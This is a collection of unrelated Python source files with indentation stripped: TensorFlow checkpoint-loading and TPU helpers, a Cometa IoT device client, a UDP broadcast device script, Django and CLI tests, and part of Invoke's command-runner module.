paths = [x for x in glob(os.path.join(checkpoint_dir, 'model-*.*')) if not x.endswith(".tmp")]
ctrs = np.array([[int(y) for y in re.findall(r'model-([0-9]+)(?:-[0-9]+)?[.](?:npy|hdf5)', x)] for x in paths]).flatten()
if len(ctrs) <= 0:
ckpt = tf.train.latest_checkpoint(checkpoint_dir, latest_filename=latest_filename)
return ckpt
ctr = ctrs.max()
return os.path.join(checkpoint_dir, 'model-{}').format(ctr)
def truncate_value(variable, value, reshape=True):
if not reshape:
return value
shape = variable.shape.as_list()
params = np.prod(shape)
params2 = np.prod(value.shape)
if params == params2:
return value
print('Truncating {} from shape {} to shape {}'.format(variable.name, value.shape, shape))
value = np.array(value)
value = value.reshape([-1])
value = value[0:params]
value = value.reshape(shape)
return value
from tensorflow.core.protobuf import config_pb2
def initialize_tpu(session=None, timeout_in_ms=None):
session = session or get_default_session()
with session.as_default():
op = tpu.initialize_system()
options = None
if timeout_in_ms:
options=config_pb2.RunOptions(timeout_in_ms=timeout_in_ms)
return session.run(op, options=options)
def load(variable, value, session=None, timeout_in_ms=None):
session = session or get_default_session()
ops = variable.initializer
vals = dict([(variable.initializer.inputs[1], value)])
#for x, (k, v) in zip(variables, vals.items()):
# print(x.name, x.shape.as_list(), k, v.shape)
options = None
if timeout_in_ms:
options=config_pb2.RunOptions(timeout_in_ms=timeout_in_ms)
return session.run(ops, vals, options=options)
def eval(variable, session=None, timeout_in_ms=None):
session = session or get_default_session()
options = None
if timeout_in_ms:
options=config_pb2.RunOptions(timeout_in_ms=timeout_in_ms)
return session.run(variable, options=options)
def grab_values(variables, reader, reshape=False):
for variable in variables:
name = variable_name(variable).split(':')[0]
value = reader.get_tensor(name)
value = truncate_value(variable, value, reshape=reshape)
yield variable, value
def assign_values(variables, values, session=None, timeout_in_ms=60000):
session = session or get_default_session()
variables = [x for x in variables]
values = [x for x in values]
ops = [x.initializer for x in variables]
vals = dict([(x.initializer.inputs[1], value.value() if isinstance(value, tf.Variable) else value) for x, value in zip(variables, values)]) # TODO: bfloat16 support
#for x, (k, v) in zip(variables, vals.items()):
# print(x.name, x.shape.as_list(), k, v.shape)
options = None
if timeout_in_ms:
options=config_pb2.RunOptions(timeout_in_ms=timeout_in_ms)
session.run(ops, vals, options=options)
def load_snapshot(ckpt, session=None, var_list=None, reshape=False):
session = session or get_default_session()
reader = pywrap_tensorflow.NewCheckpointReader(ckpt)
vs = var_list or tf.trainable_variables()
for variables in tqdm.tqdm(list(split_by_params(vs))):
values = [value for variable, value in grab_values(variables, reader, reshape=reshape)]
assign_values(variables, values, session=session)
def get_variable(name, var_list=None):
name, num = name.split(':') if ':' in name else (name, '0')
num = int(num)
name = os.path.join(tf.get_variable_scope().name, name)
vs = var_list or tf.trainable_variables()
for x in vs:
if x.name.startswith(name + ':%d' % num):
return x
def load_weights(ckpt, session=None, var_list=None, reshape=False):
session = session or get_default_session()
vs = var_list or tf.trainable_variables()
files = list(sorted(glob(ckpt + '-*.npy')))
for out in tqdm.tqdm(files):
for name, value in np.load(out, allow_pickle=True):
variable = get_variable(name)
if variable is None:
print('Warning: variable %s not loaded' % name)
else:
value = truncate_value(variable, value, reshape=reshape)
variable.load(value, session)
def load_variables(ckpt, session=None, var_list=None, reshape=False):
session = session or get_default_session()
vs = var_list or tf.trainable_variables()
with h5py.File(ckpt, "r") as f:
for variables in tqdm.tqdm(list(split_by_params(vs))):
values = [truncate_value(x, f[variable_name(x)], reshape=reshape) for x in variables]
assign_values(variables, values, session=session)
def maketree(path):
try:
os.makedirs(path)
except:
pass
state.cache_ops = {}
def cast_variables(variables, graph=None, cache_ops=None):
if graph is None:
graph = get_default_graph()
if cache_ops is None:
cache_ops = state.cache_ops
if graph not in cache_ops:
cache_ops[graph] = {}
cache = cache_ops[graph]
ops = []
for variable in variables:
if variable in cache:
op = cache[variable]
elif variable.dtype == dtypes.bfloat16_ref or variable.dtype == tf.bfloat16:
op = tf.cast(variable, tf.float32)
else:
op = variable
cache[variable] = op
ops.append(op)
return ops
import re
def variable_name(variable):
if re.match(r'core[0-9]+/', variable.name):
return variable.name.split('/', 1)[-1]
return variable.name
def save_variables(ckpt, session=None, var_list=None):
session = session or get_default_session()
vs = var_list or tf.trainable_variables()
maketree(os.path.dirname(ckpt))
fname = ckpt+'.tmp'
with h5py.File(fname, "w") as f:
for variables in tqdm.tqdm(list(split_by_params(vs))):
ops = cast_variables(variables)
values = session.run(ops)
for value, variable in zip(values, variables):
name = variable_name(variable)
shape = variable.shape.as_list()
dtype = variable.dtype
dset = f.create_dataset(name, shape, dtype=np.float32)
dset[:] = value
print('Writing snapshot %s' % ckpt)
os.rename(ckpt+'.tmp', ckpt)
def fetch_variables(session=None, var_list=None):
session = session or get_default_session()
vs = var_list or tf.trainable_variables()
for variables in tqdm.tqdm(list(split_by_params(vs))):
values = session.run(variables)
yield variables, values
def partition_variables(session=None, var_list=None):
session = session or get_default_session()
vs = var_list or tf.trainable_variables()
for variables in tqdm.tqdm(list(split_by_params(vs))):
yield variables
class Saver(object):
def __init__(
self,
var_list=None,
reshape=False,
sharded=False,
max_to_keep=5,
keep_checkpoint_every_n_hours=10000.0,
name=None,
restore_sequentially=False,
saver_def=None,
builder=None,
defer_build=False,
allow_empty=False,
write_version=tf.train.SaverDef.V2,
pad_step_number=False,
save_relative_paths=False,
filename=None):
self.var_list = var_list
self.reshape = reshape
self.sharded = sharded
self.max_to_keep = max_to_keep
self.keep_checkpoint_every_n_hours = keep_checkpoint_every_n_hours
self.name = name
self.restore_sequentially = restore_sequentially
self.saver_def = saver_def
self.builder = builder
self.defer_build = defer_build
self.allow_empty = allow_empty
self.write_version = write_version
self.pad_step_number = pad_step_number
self.save_relative_paths = save_relative_paths
self.filename = filename
self.checkpoints = []
def restore(self, sess, save_path):
if save_path.endswith('.ckpt'):
load_snapshot(save_path, session=sess, var_list=self.var_list, reshape=self.reshape)
elif save_path.endswith('.hdf5'):
load_variables(save_path, session=sess, var_list=self.var_list, reshape=self.reshape)
elif os.path.exists(save_path + '.npy') or os.path.exists(save_path + '-0.npy'):
load_weights(save_path, session=sess, var_list=self.var_list, reshape=self.reshape)
elif os.path.exists(save_path + '.hdf5'):
load_variables(save_path + '.hdf5', session=sess, var_list=self.var_list, reshape=self.reshape)
else:
raise Exception("Can't load checkpoint %s" % save_path)
def save(self,
sess,
save_path,
global_step=None,
latest_filename=None,
meta_graph_suffix="meta",
write_meta_graph=True,
write_state=True,
strip_default_attrs=False,
save_debug_info=False):
if global_step is not None:
name = '%s-%d.hdf5' % (save_path, global_step)
else:
name = '%s.hdf5' % save_path
save_variables(name, session=sess, var_list=self.var_list)
self.checkpoints.append(name)
if self.max_to_keep > 0:
while len(self.checkpoints) > self.max_to_keep:
fname = self.checkpoints[0]
if fname != name:
print('Truncating %s' % fname)
try:
with open(fname, "wb") as f:
pass
except:
print('Failed to truncate %s' % fname)
self.checkpoints = self.checkpoints[1:]
def fetch(self, sess, var_list=None):
if var_list == None:
var_list = self.var_list
for variables, values in fetch_variables(session=sess, var_list=var_list):
yield variables, values
def variables(self, sess, var_list=None):
if var_list == None:
var_list = self.var_list
for variables in partition_variables(session=sess, var_list=var_list):
yield variables
def assign(self, sess, variables, values):
return assign_values(variables, values, session=sess)
class Commands(object):
def __init__(self, path='commands'):
self.path = path
self.commands = []
self.args = []
self.keys = {}
self.frozen = False
def has(self, name, **keys):
if 'action' in keys:
action = keys.pop('action')
for name1, action1 in self.commands:
if name == name1 and action1 == action:
return True
else:
for name1, action1 in self.commands:
if name == name1:
return True
return False
def add(self, name, action=None):
if not self.has(name=name, action=action):
self.commands.append((name, action))
full = self.full_path(name)
maketree(full)
def full_path(self, name):
return os.path.join(self.path, name)
def check(self, *args, **keys):
if not self.frozen:
heartbeat()
ops = []
seen = set()
for name, action in self.commands:
full = self.full_path(name)
if not os.path.isdir(full):
if name not in seen:
seen.add(name)
ops.append(name)
for op in ops:
self.run(op, *args, **keys)
return ops
def run(self, op):
ran = False
for name, action in self.commands:
if name == op:
print('Running command', name, action)
if not ran:
full = self.full_path(op)
maketree(full)
ran = True
if action:
action()
if not ran:
raise Exception('Commands.execute failed: no such command: {}'.format(op))
def run_with_args(self, op, *args, **keys):
with CommandArgs(*args, **keys):
return self.run(op)
commander = None
def commands(**keys):
global commander
if commander is None:
commander = Commands()
cmds = keys.pop('commands') if 'commands' in keys else None
if cmds is not None:
for cmd in cmds:
action = None
if isinstance(cmd, str):
name = cmd
elif len(cmd) >= 2:
name, action = cmd
elif len(cmd) >= 1:
name = cmd[0]
else:
continue
commander.add(name=name, action=action)
return commander
class CommandArgs(object):
def __init__(self, *args, **keys):
self.args = list(args)
self.keys = keys.copy()
self.cmdr = commands()
def __enter__(self):
self.args_prev = self.cmdr.args
self.keys_prev = self.cmdr.keys
self.cmdr.args = self.args
self.cmdr.keys = self.keys
def __exit__(self, *excinfo):
self.cmdr.args = self.args_prev
self.cmdr.keys = self.keys_prev
def check_commands():
try:
cmdr = commands()
return cmdr.check()
except:
traceback.print_exc()
def check_commands_with_args(*args, **keys):
try:
cmdr = commands()
with CommandArgs(*args, **keys):
return cmdr.check()
except:
traceback.print_exc()
def add_command(name, action=None, **keys):
cmdr = commands()
return cmdr.add(name=name, action=action)
def register_command(*args, **keys):
fn = args[0]
if isinstance(fn, str):
add_command(fn)
else:
name = fn.__qualname__
name = name.replace('.<locals>.', '_command_')
if name.endswith('_command_save'):
name = 'save'
name = name.replace('___', '/')
action = fn
print(name, action)
add_command(name, action)
return fn
def has_command(name):
cmdr = commands()
return cmdr.has(name)
def run_command(command_name):
cmdr = commands()
return cmdr.run(command_name)
def run_command_with_args(command_name, *args, **keys):
cmdr = commands()
return cmdr.run_with_args(command_name, *args, **keys)
def command_arg(x, unset=None):
cmdr = commands()
if isinstance(x, int):
try:
return cmdr.args[x]
except:
return unset
else:
if x in cmdr.keys:
return cmdr.keys[x]
return unset
def command_args():
cmdr = commands()
return cmdr.args, cmdr.keys
@register_command
def attach_debugger():
import pdb
pdb.set_trace()
from pprint import pprint
@register_command
def print_status():
args, props = command_args()
for k, v in enumerate(args):
pprint(v)
for k, v in props.items():
pprint({k: v})
#
# return current UTC timestamp.
#
def utc():
from datetime import datetime
d = datetime.utcnow()
import calendar
return calendar.timegm(d.utctimetuple())
def heartbeat():
pongfile=os.environ['PONG'] if 'PONG' in os.environ else 'pong.txt'
with open(pongfile, "a+") as f:
nonce = os.urandom(8).hex()
now=utc()
out="pid{}_time{}_nonce{}\n".format(os.getpid(), now, nonce)
#print("PONG! Writing {} to {}".format(out, pongfile))
f.write(out)
f.flush()
import time
@register_command
def freeze_forever():
cmdr = commands()
if cmdr.frozen:
print("Already frozen.")
return
prev = cmdr.frozen
cmdr.frozen = True
print('Simulating a freeze; going into an infinite loop:')
prev=time.time()
try:
while not should_quit():
elapsed=time.time() - prev
print('Frozen for {}s'.format(elapsed))
time.sleep(1)
check_commands()
finally:
cmdr.frozen = prev
_quit = False
import sys
@register_command
def quit():
global _quit
if _quit:
print("Failed to quit; running sys.exit(1)")
sys.exit(1)
else:
print("Quitting...")
_quit = True
def should_quit():
return _quit
@register_command
def save_and_quit():
global _quit
if has_command('save'):
print("Saving...")
run_command('save')
quit()
@register_command
def throw_exception():
raise Exception("This exception should be caught and logged by the tflex command system")
import tensorflow as tf
from contextlib import contextmanager
@contextmanager
def nullcontext(enter_result=None):
yield enter_result
def set_override_device(value, session=None):
session = get_session(session)
session._override_device = value
return value
def has_override_device(session=None):
session = get_session(session)
return hasattr(session, '_override_device')
def get_override_device(session=None):
session = get_session(session)
if hasattr(session, '_override_device'):
return session._override_device
def set_override_cores(value, session=None):
session = get_session(session)
session._override_cores = value
return value
def has_override_cores(session=None):
session = get_session(session)
return hasattr(session, '_override_cores')
def get_override_cores(session=None):
session = get_session(session)
if hasattr(session, '_override_cores'):
return session._override_cores
def device_for_tpu_core(task=0, core=0, job_name="tpu_worker"):
return "/job:%s/task:%d/device:TPU_REPLICATED_CORE:%d" % (job_name, task, core)
def device(name=''):
if has_override_device():
return nullcontext()
if has_override_cores():
if name is None:
return tf.device(name)
if name.startswith('/gpu:'):
i = int(name.split(':', 1)[-1])
return tf.device(get_cores()[i].name)
if name.startswith('/tpu:'):
i = int(name.split(':', 1)[-1])
return tf.device(device_for_tpu_core(core=i))
if name.startswith('/cpu:'):
i = int(name.split(':', 1)[-1])
return tf.device(get_cpus()[i].name)
return nullcontext()
if name is None:
return tf.device(None)
if 'gpu' in name:
if has_gpu():
return tf.device(name)
if 'cpu' in name:
return tf.device(name)
return nullcontext()
|
cometalib.py
|
"""
Author: Emile Camus
"""
__license__ = """
Copyright 2015 Visible Energy Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__all__ = ["CometaClient"]
import socket
import select
import time
import threading
import ssl
# From http-parser (0.8.3)
# pip install http-parser
from http_parser.parser import HttpParser
import pdb
class CometaClient(object):
"""Connect a device to the Cometa infrastructure"""
errors = {0:'ok', 1:'timeout', 2:'network error', 3:'protocol error', 4:'authorization error', 5:'wrong parameters', 9:'internal error'}
def __init__(self,server, port, application_id, use_ssl):
"""
The Cometa instance constructor.
server: the Cometa server FQDN
port: the Cometa server port
application_id: the Cometa application ID
"""
self.error = 9
self.debug = False
self._server = server
self._port = port
self._app_id = application_id
self._use_ssl = use_ssl
self._message_cb = None
self._device_id = ""
self._platform = ""
self._hparser = None
self._sock = None #socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._heartbeat_rate = 60
self._trecv = None
self._thbeat = None
self._hb_lock = threading.Lock()
self._reconnecting = False
return
def attach(self, device_id, device_info):
"""
Attach the specified device to a Cometa registered application.
Authentication is done using only the application_id (one-way authentication).
device_id: the device unique identifier
device_info: a description of the platform or the device (used only as a comment)
"""
self._device_id = device_id
self._platform = device_info
self._hparser = HttpParser()
tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self._use_ssl:
self._sock = ssl.wrap_socket(tsock, ssl_version=ssl.PROTOCOL_SSLv23, ciphers="AES256-GCM-SHA384")
else:
self._sock = tsock
try:
self._sock.connect((self._server, self._port))
sendBuf="POST /v1/applications/%s/devices/%s HTTP/1.1\r\nHost: api.cometa.io\r\nContent-Length:%d\r\n\r\n%s" % (self._app_id,device_id,len(device_info),device_info)
self._sock.send(sendBuf)
recvBuf = ""
while True:
data = self._sock.recv(1024)
if not data:
break
dataLen = len(data)
nparsed = self._hparser.execute(data, dataLen)
assert nparsed == dataLen
if self._hparser.is_headers_complete():
if self.debug:
print "connection for device %s headers received" % (device_id)
print self._hparser.get_headers()
if self._hparser.is_partial_body():
recvBuf = self._hparser.recv_body()
if self.debug:
print "connection for device %s body received" % (device_id)
print recvBuf
#TODO: check for error in connecting, i.e. 403 already connected
# reading the attach complete message from the server
# i.e. {"msg":"200 OK","heartbeat":60,"timestamp":1441382935}
if len(recvBuf) < 16 or recvBuf[1:12] != '"msg":"200"':
self.error = 5
print "Error in string from server; %s" % recvBuf
return recvBuf
# reset error
self.error = 0
# set the socket non blocking
self._sock.setblocking(0)
# do not (re)start the threads during a reconnection
if self._reconnecting:
self._reconnecting = False
return recvBuf
if self.debug:
print "connection for device %s completed" % (device_id)
# start the hearbeat thread
self._thbeat = threading.Thread(target=self._heartbeat)
self._thbeat.daemon = True
self._thbeat.start()
# start the receive thread
#time.sleep(2)
self._trecv = threading.Thread(target=self._receive)
self._trecv.daemon = True # force to exit on SIGINT
self._trecv.start()
return recvBuf
except Exception, e:
print e
self.error = 2
return
def send_data(self, msg):
"""
Send a data event message upstream to the Cometa server.
If a Webhook is specified for the Application in the Cometa configuration file /etc/cometa.conf on the server,
the message is relayed to the Webhook. Also, the Cometa server propagates the message to all open devices Websockets.
"""
sendBuf = "%x\r\n%c%s\r\n" % (len(msg) + 1,'\07',msg)
if self._reconnecting:
if self.debug:
print "Error in Cometa.send_data(): device is reconnecting."
return -1
try:
self._hb_lock.acquire()
self._sock.send(sendBuf)
self._hb_lock.release()
except Exception, e:
if self.debug:
print "Error in Cometa.send_data(): socket write failed."
return -1
return 0
def bind_cb(self, message_cb):
"""
Binds the specified user callback to the Cometa instance.
"""
self._message_cb = message_cb
return
def perror(self):
"""
Return a string for the current error.
"""
return CometaClient.errors[self.error]
def _heartbeat(self):
"""
The heartbeat thread.
The hearbeat message is a chunk of length 3 with the MSG_HEARBEAT byte and closed with CRLF.
This thread detects a server disconnection and attempts to reconnect to the Cometa server.
"""
if self.debug:
print "Hearbeat thread started.\r"
while True:
time.sleep(self._heartbeat_rate)
if self._reconnecting:
print "--- heartbeat while reconnecting"
continue
sendBuf = "1\r\n%c\r\n" % '\06'
print "sending heartbeat"
try:
self._hb_lock.acquire()
self._sock.send(sendBuf)
self._hb_lock.release()
except Exception, e:
print "--- error sending heartbeat"
return
def _receive(self):
"""
The receive and user callback dispatch loop thread.
"""
if self.debug:
print "Receive thread started.\r"
while True:
ready_to_read, ready_to_write, in_error = select.select([self._sock.fileno()],[],[self._sock.fileno()], 15)
# check for timeout
if not (ready_to_read or ready_to_write or in_error):
continue
for i in in_error:
# handle errors as disconnections and try to reconnect to the server
print "Network error in receive loop (error). Reconnecting..."
self._sock.close()
# self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._reconnecting = True
ret = self.attach(self._device_id, self._platform)
if self.error != 0:
print "Error in attaching to Cometa.", self.perror()
time.sleep(15)
continue
else:
print "Device attached to Cometa.", ret
continue
for i in ready_to_read:
try:
data = self._sock.recv(1024)
except Exception, e:
print e
pass
if not data:
# handle errors as disconnections and try to reconnect to the server
print "Network error in receive loop (no data). Reconnecting..."
try:
self._sock.close()
except Exception, e:
print "--- exception in close socket."
pass
# self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._reconnecting = True
ret = self.attach(self._device_id, self._platform)
if self.error != 0:
print "Error in attaching to Cometa.", self.perror()
time.sleep(15)
continue
else:
print "Device attached to Cometa.", ret
continue
if self.debug:
print "** received: %s (%d)" % (data, len(data))
self._hparser.execute(data, len(data))
if self._hparser.is_partial_body():
to_send = self._hparser.recv_body()
# pdb.set_trace()
# the payload contains a HTTP chunk
if self._message_cb:
# invoke the user callback
reply = self._message_cb(to_send, len(to_send))
else:
reply = ""
if self.debug:
print "After callback."
else:
continue
if self.debug:
print "Returning result."
sendBuf = "%x\r\n%s\r\n" % (len(reply),reply)
try:
self._hb_lock.acquire()
self._sock.send(sendBuf)
self._hb_lock.release()
except Exception, e:
print "--- error sending reply"
pass
msg = ""
|
test_cli.py
|
import json
import os
import signal
import threading
import time
import heal
OK_OUTPUT = """
watching: {0}, {1}
tests directory has changed
reading configuration
validating tests
exiting: loop-ending signal
""".lstrip()
def test_ok(tmp_path, capsys):
tests_directory = tmp_path.joinpath("conf")
tests_directory.mkdir()
mode_file = tmp_path.joinpath("mode-file")
status_file = tmp_path.joinpath("status.json")
def delayed_kill():
time.sleep(0.5)
os.kill(os.getpid(), signal.SIGINT)
threading.Thread(target=delayed_kill).start()
heal.main(["-t", str(tests_directory), "-m", str(mode_file), "-s", str(status_file), "-d", "0.2"])
assert capsys.readouterr().out == OK_OUTPUT.format(tests_directory, mode_file)
assert json.loads(status_file.read_text(encoding="utf-8")).get("status") == "ok"
|
cool-device.py
|
import json
from connection import *
import connection
from datetime import datetime
state = 0
def getIncomingCommands():
global state
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", 5006))
while True:
if connection.CONNECTED:
data, addr = sock.recvfrom(1024)
print(data)
try:
jsonParsed = json.loads(data)
SN = jsonParsed['SN']
if SN == connection.SERIAL_NUMBER:
state = jsonParsed['state']
except Exception as e:
pass
else:
sleep(1)
def sendData():
global i
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
if connection.CONNECTED:
sock.sendto(
bytes(
"{\"SN\": \"" + SERIAL_NUMBER + "\",\"nickname\":\"" +
connection.NICKNAME +
"\",\"action\": \"COOL\",\"power\":" +
str(connection.POWER) + ", \"value\":" + str(state) + "}",
"utf-8"), ("255.255.255.255", 5005))
print("{\"SN\": \"" + SERIAL_NUMBER + "\",\"nickname\":\"" +
connection.NICKNAME + "\",\"action\": \"COOL\",\"power\":" +
str(connection.POWER) + ", \"value\":" + str(state) + "}")
print("state=" + str(state))
sleep(5)
checkConnection = threading.Thread(target=waitForConnection)
sender = threading.Thread(target=sendData)
getCommands = threading.Thread(target=getIncomingCommands)
checkConnection.start()
sender.start()
getCommands.start()
while True:
sleep(1)
|
test_udp_protocol.py
|
from django.test import TestCase
from data_reader.models import ModbusRTU, UdpProtocol, BrokenTransductorException, TransportProtocol
from transductor.models import EnergyTransductor, TransductorModel
import threading
import mock
import socket
import SocketServer
class UDPHandler(SocketServer.BaseRequestHandler):
"""
This class works similar to the TCP handler class, except that
self.request consists of a pair of data and client socket, and since
there is no connection the client address must be given explicitly
when sending data back via sendto().
"""
def handle(self):
data = self.request[0].strip()
socket = self.request[1]
if data == 'Request 1':
response = 'Response 1'
socket.sendto(response, self.client_address)
elif data == 'Request 2':
response = 'Response 2'
socket.sendto(response, self.client_address)
else:
pass
class UDPProtocolTest(TestCase):
def setUp(self):
HOST, PORT = "localhost", 9999
# Creating Transductor Model and Energy Transductor
t_model = TransductorModel()
t_model.name = "TR 4020"
t_model.transport_protocol = "UDP"
t_model.serial_protocol = "Modbus RTU"
t_model.register_addresses = [[4, 0], [68, 1]]
t_model.save()
transductor = EnergyTransductor()
transductor.serie_number = "1"
transductor.description = "Test"
transductor.model = t_model
transductor.ip_address = HOST
transductor.save()
# Setting instance attributes
self.t_model = t_model
self.transductor = transductor
self.modbus_rtu = ModbusRTU(self.transductor)
self.udp_protocol = UdpProtocol(serial_protocol=self.modbus_rtu, timeout=0.5, port=9999)
# Starting UDP server via thread
self.server = SocketServer.UDPServer((HOST, PORT), UDPHandler)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.start()
def tearDown(self):
self.server.shutdown()
self.server.server_close()
def test_create_socket(self):
self.assertEqual(socket.AF_INET, self.udp_protocol.socket.family)
self.assertEqual(socket.SOCK_DGRAM, self.udp_protocol.socket.type)
self.assertEqual(0.5, self.udp_protocol.socket.gettimeout())
def test_reset_receive_attempts(self):
self.udp_protocol.receive_attempts += 1
self.assertEqual(1, self.udp_protocol.receive_attempts)
self.udp_protocol.reset_receive_attempts()
self.assertEqual(0, self.udp_protocol.receive_attempts)
def test_receive_message_via_socket_udp(self):
messages_to_send = [
'Request 1',
'Request 2'
]
messages = self.udp_protocol.handle_messages_via_socket(messages_to_send)
response = [
'Response 1',
'Response 2'
]
self.assertEqual(response, messages)
def test_udp_socket_timeout(self):
wrong_ip_address = '0.0.0.0'
self.transductor.ip_address = wrong_ip_address
test_modbus_rtu = ModbusRTU(self.transductor)
test_udp_protocol = UdpProtocol(serial_protocol=test_modbus_rtu, timeout=0.5)
messages_to_send = [
'Request 1',
'Request 2'
]
messages = test_udp_protocol.handle_messages_via_socket(messages_to_send)
self.assertIsNone(messages)
@mock.patch.object(ModbusRTU, 'create_messages', return_value='any created messages', autospec=True)
@mock.patch.object(UdpProtocol, 'handle_messages_via_socket', return_value=None, autospec=True)
def test_start_communication_with_transductor_not_broken_and_socket_timeout(self, mock_udp_method, mock_modbus_method):
with self.assertRaises(BrokenTransductorException):
self.udp_protocol.start_communication()
self.assertEqual(self.udp_protocol.receive_attempts, self.udp_protocol.max_receive_attempts)
@mock.patch.object(ModbusRTU, 'create_messages', return_value='any created messages', autospec=True)
@mock.patch.object(UdpProtocol, 'handle_messages_via_socket', return_value='any return', autospec=True)
def test_start_communication_working_properly(self, mock_udp_method, mock_modbus_method):
self.assertEqual('any return', self.udp_protocol.start_communication())
self.assertEqual(0, self.udp_protocol.receive_attempts)
def test_start_communication_abstract_method(self):
self.assertEqual(None, TransportProtocol.start_communication(self.udp_protocol))
|
runners.py
|
# -*- coding: utf-8 -*-
import locale
import os
import struct
from subprocess import Popen, PIPE
import sys
import threading
import time
import signal
from .util import six
# Import some platform-specific things at top level so they can be mocked for
# tests.
try:
import pty
except ImportError:
pty = None
try:
import fcntl
except ImportError:
fcntl = None
try:
import termios
except ImportError:
termios = None
from .exceptions import (
UnexpectedExit,
Failure,
ThreadException,
WatcherError,
SubprocessPipeError,
CommandTimedOut,
)
from .terminals import (
WINDOWS,
pty_size,
character_buffered,
ready_for_reading,
bytes_to_read,
)
from .util import has_fileno, isatty, ExceptionHandlingThread, encode_output
class Runner(object):
"""
Partially-abstract core command-running API.
This class is not usable by itself and must be subclassed, implementing a
number of methods such as `start`, `wait` and `returncode`. For a subclass
implementation example, see the source code for `.Local`.
.. versionadded:: 1.0
"""
read_chunk_size = 1000
input_sleep = 0.01
def __init__(self, context):
"""
Create a new runner with a handle on some `.Context`.
:param context:
a `.Context` instance, used to transmit default options and provide
access to other contextualized information (e.g. a remote-oriented
`.Runner` might want a `.Context` subclass holding info about
hostnames and ports.)
.. note::
The `.Context` given to `.Runner` instances **must** contain
default config values for the `.Runner` class in question. At a
minimum, this means values for each of the default
`.Runner.run` keyword arguments such as ``echo`` and ``warn``.
:raises exceptions.ValueError:
if not all expected default values are found in ``context``.
"""
#: The `.Context` given to the same-named argument of `__init__`.
self.context = context
#: A `threading.Event` signaling program completion.
#:
#: Typically set after `wait` returns. Some IO mechanisms rely on this
#: to know when to exit an infinite read loop.
self.program_finished = threading.Event()
# I wish Sphinx would organize all class/instance attrs in the same
# place. If I don't do this here, it goes 'class vars -> __init__
# docstring -> instance vars' :( TODO: consider just merging class and
# __init__ docstrings, though that's annoying too.
#: How many bytes (at maximum) to read per iteration of stream reads.
self.read_chunk_size = self.__class__.read_chunk_size
# Ditto re: declaring this in 2 places for doc reasons.
#: How many seconds to sleep on each iteration of the stdin read loop
#: and other otherwise-fast loops.
self.input_sleep = self.__class__.input_sleep
#: Whether pty fallback warning has been emitted.
self.warned_about_pty_fallback = False
#: A list of `.StreamWatcher` instances for use by `respond`. Is filled
#: in at runtime by `run`.
self.watchers = []
self._timer = None
def run(self, command, **kwargs):
"""
Execute ``command``, returning an instance of `Result`.
.. note::
All kwargs will default to the values found in this instance's
`~.Runner.context` attribute, specifically in its configuration's
``run`` subtree (e.g. ``run.echo`` provides the default value for
the ``echo`` keyword, etc). The base default values are described
in the parameter list below.
:param str command: The shell command to execute.
:param str shell:
Which shell binary to use. Default: ``/bin/bash`` (on Unix;
``COMSPEC`` or ``cmd.exe`` on Windows.)
:param bool warn:
Whether to warn and continue, instead of raising
`.UnexpectedExit`, when the executed command exits with a
nonzero status. Default: ``False``.
.. note::
This setting has no effect on exceptions, which will still be
raised, typically bundled in `.ThreadException` objects if they
were raised by the IO worker threads.
Similarly, `.WatcherError` exceptions raised by
`.StreamWatcher` instances will also ignore this setting, and
will usually be bundled inside `.Failure` objects (in order to
preserve the execution context).
Ditto `.CommandTimedOut` - basically, anything that prevents a
command from actually getting to "exited with an exit code"
ignores this flag.
:param hide:
Allows the caller to disable ``run``'s default behavior of copying
the subprocess' stdout and stderr to the controlling terminal.
Specify ``hide='out'`` (or ``'stdout'``) to hide only the stdout
stream, ``hide='err'`` (or ``'stderr'``) to hide only stderr, or
``hide='both'`` (or ``True``) to hide both streams.
The default value is ``None``, meaning to print everything;
``False`` will also disable hiding.
.. note::
Stdout and stderr are always captured and stored in the
``Result`` object, regardless of ``hide``'s value.
.. note::
``hide=True`` will also override ``echo=True`` if both are
given (either as kwargs or via config/CLI).
:param bool pty:
By default, ``run`` connects directly to the invoked process and
reads its stdout/stderr streams. Some programs will buffer (or even
behave) differently in this situation compared to using an actual
terminal or pseudoterminal (pty). To use a pty instead of the
default behavior, specify ``pty=True``.
.. warning::
Due to their nature, ptys have a single output stream, so the
ability to tell stdout apart from stderr is **not possible**
when ``pty=True``. As such, all output will appear on
``out_stream`` (see below) and be captured into the ``stdout``
result attribute. ``err_stream`` and ``stderr`` will always be
empty when ``pty=True``.
:param bool fallback:
Controls auto-fallback behavior re: problems offering a pty when
``pty=True``. Whether this has any effect depends on the specific
`Runner` subclass being invoked. Default: ``True``.
:param bool echo:
Controls whether `.run` prints the command string to local stdout
prior to executing it. Default: ``False``.
.. note::
``hide=True`` will override ``echo=True`` if both are given.
:param dict env:
By default, subprocesses receive a copy of Invoke's own environment
(i.e. ``os.environ``). Supply a dict here to update that child
environment.
For example, ``run('command', env={'PYTHONPATH':
'/some/virtual/env/maybe'})`` would modify the ``PYTHONPATH`` env
var, with the rest of the child's env looking identical to the
parent.
.. seealso:: ``replace_env`` for changing 'update' to 'replace'.
:param bool replace_env:
When ``True``, causes the subprocess to receive the dictionary
given to ``env`` as its entire shell environment, instead of
updating a copy of ``os.environ`` (which is the default behavior).
Default: ``False``.
:param str encoding:
Override auto-detection of which encoding the subprocess is using
for its stdout/stderr streams (which defaults to the return value
of `default_encoding`).
:param out_stream:
A file-like stream object to which the subprocess' standard output
should be written. If ``None`` (the default), ``sys.stdout`` will
be used.
:param err_stream:
Same as ``out_stream``, except for standard error, and defaulting
to ``sys.stderr``.
:param in_stream:
A file-like stream object to used as the subprocess' standard
input. If ``None`` (the default), ``sys.stdin`` will be used.
